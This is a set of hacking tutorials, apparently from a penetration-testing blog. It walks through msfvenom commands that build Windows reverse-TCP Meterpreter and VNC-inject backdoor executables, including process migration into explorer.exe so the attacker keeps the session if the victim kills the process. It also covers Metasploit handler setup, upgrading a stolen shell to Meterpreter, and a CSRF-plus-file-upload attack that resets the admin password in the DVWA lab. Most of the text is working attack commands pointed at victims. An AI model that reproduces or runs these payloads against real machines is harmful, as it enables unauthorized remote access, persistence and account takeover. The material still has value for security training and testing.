Hiding Shell with Prepend Migrate using Msfvenom

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

LETS!!! START
Open the terminal in kali Linux and type following command to generate exe payload.
Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe
Above command will create the raj.exe file on the Desktop now send this file to remote system for attack


Load metasploit framework and type following command to start the attack.
msfconsole
use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpreter session.

meterpreter> sysinfo


Now let check the process ID of our payload.
meterpreter> ps
From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.


Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.
meterpreter> kill 4960

But!!!  Still we have victim’s session which means raj.exe file migrate into new process ID.
meterpreter> sysinfo

Shell to Meterpreter using Session Command

In previous article we have seen how to upgrade a command shell into meterpreter using Post exploitation in metasploit. Again we are going to perform same task using a different technique.

LETS BEGIN!!!
msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.


Once you got the reverse connection of remote system and access its command shell through metasploit now you can manipulate your active sessions.  You just need to type sessions –h as command inside metasploit, this help command will display the multiple option which can be utilized with active session.
msf auxiliary(telnet_login) >sessions –h

So in the following screenshot you can perceive that the highlighted option is used to upgrade a command shell into meterpreter session.


Since we have command shell so here we can use “-u” (option) with session ID for upgrading our shell into meterpreter session. Execute following command for session manipulation.
msf auxiliary(telnet_login) >sessions –u 1

When you will execute above command you will get meterpreter session as session 2. Now enjoy your meterpreter session and execute its command.
msf auxiliary(telnet_login) >sessions

Capture VNC Session of Remote PC using Msfvenom

Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial you’ll learn how to create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.
Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

Msfvenom –p windows/vncinject/reverse_tcp lhost=192.168.1.15 lport=4444 –f exe > /root/Desktop/vnc.exe


Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.


msfconsole
use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit


Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.


How to Upgrade Shell to Meterpreter

In network penetration testing, we always wish to hack a system of an internal network and try to make an unauthorized access through meterpreter session using metasploit framework.  But there are some exploits which provides directly victim’s command shell instead of meterpreter session. In this article we have tried to upgrade from victim’s shell to meterpreter shell.

In previous article we had discussed related to how to access victim’s shell. Now once you have access victims command shell then follow the given below step to upgrade a command shell into meterepreter shell.

Here I have already access command shell of victim’s Pc
msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.


This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp' used on all others.
use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit


Let’s verify the TYPE for session 2
msf post(shell_to_meterpreter) >sessions
Now have a look over last image which is showing the new session i.e. session 2 is a meterpreter session.

Bypass CSRF Medium Security in DVWA

In previous article we have discussed about how to bypass low level security if a web application server is suffering from cross site request forgery (CSRF). Today we will see how to exploit a web application server with CSRF attack if the security level get increased or say set to medium and try to change the password of admin without his permission.

Let’s start!!!

Again I have target DVWA for this tutorial and by default the credential set for it is admin: password. As you can see I have used them for login in DVWA


Set security level medium select the bug cross site request forgery as current vulnerability.  Here you see the text fields are given for changing the password of the database for user admin.


If you remembered in the previous article we have executed csrf.html file to change the password for admin when security level is low.

In following screenshot you can see I have given value= “hacker” as new password and confirm password.


Now I am going to test whether the same file csrf.html would be capable to change the password for admin when security level is medium. From screenshot you can see I try to execute csrf.html file which might reset the password.


As result you can see I didn’t successes to bypass medium security using csrf.html and got an error message “that request didn’t look correct”. Hence the technique which we have used in low security will get failed in medium security level.



Sometimes it might be possible that a web application server may have more than one vulnerabilities in it. It could be a big advantage because making use of other vulnerability we can perform an action to execute our malicious file through it.
 Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

 Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.


Now browse the path 192.168.1.102:81/dvwa/hackable/uploads/csrf.php in URL to execute csrf.php file and click on change button.


GREAT!!!
From screenshot you can see without admin permission we have successfully changed his password.


Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.


Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass medium security in DVWA.